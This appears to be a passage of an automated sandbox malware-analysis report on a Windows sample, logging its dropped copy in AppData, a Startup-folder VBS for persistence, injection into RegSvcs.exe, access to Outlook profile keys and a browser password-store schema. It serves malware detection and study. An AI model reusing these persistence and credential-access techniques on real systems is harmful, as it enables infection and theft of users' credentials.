                Source: 6cicUo3f8g.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegSvcs.exe, 00000003.00000002.4584887740.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002FCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002F97000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000027B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002806000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000027C6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000027D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 6cicUo3f8g.exeReversingLabs: Detection: 82%
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeFile read: C:\Users\user\Desktop\6cicUo3f8g.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\6cicUo3f8g.exe "C:\Users\user\Desktop\6cicUo3f8g.exe"
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeProcess created: C:\Users\user\AppData\Local\Thebesian\toggeries.exe "C:\Users\user\Desktop\6cicUo3f8g.exe"
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\6cicUo3f8g.exe"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Thebesian\toggeries.exe "C:\Users\user\AppData\Local\Thebesian\toggeries.exe"
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Thebesian\toggeries.exe"
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeProcess created: C:\Users\user\AppData\Local\Thebesian\toggeries.exe "C:\Users\user\Desktop\6cicUo3f8g.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\6cicUo3f8g.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Thebesian\toggeries.exe "C:\Users\user\AppData\Local\Thebesian\toggeries.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Thebesian\toggeries.exe" Jump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: 6cicUo3f8g.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 6cicUo3f8g.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 6cicUo3f8g.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 6cicUo3f8g.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 6cicUo3f8g.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 6cicUo3f8g.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 6cicUo3f8g.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: toggeries.exe, 00000002.00000003.2199979057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000002.00000003.2198284042.0000000003670000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2351747095.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2353097903.0000000003940000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: toggeries.exe, 00000002.00000003.2199979057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000002.00000003.2198284042.0000000003670000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2351747095.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2353097903.0000000003940000.00000004.00001000.00020000.00000000.sdmp
                Source: 6cicUo3f8g.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 6cicUo3f8g.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 6cicUo3f8g.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 6cicUo3f8g.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 6cicUo3f8g.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008E4B37 LoadLibraryA,GetProcAddress,0_2_008E4B37
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00908945 push ecx; ret 0_2_00908958
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B08945 push ecx; ret 2_2_00B08958
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeFile created: C:\Users\user\AppData\Local\Thebesian\toggeries.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbsJump to dropped file
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbsJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbsJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008E48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008E48D7
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00965376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00965376
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00AE48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00AE48D7
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B65376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00B65376
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00903187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00903187
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
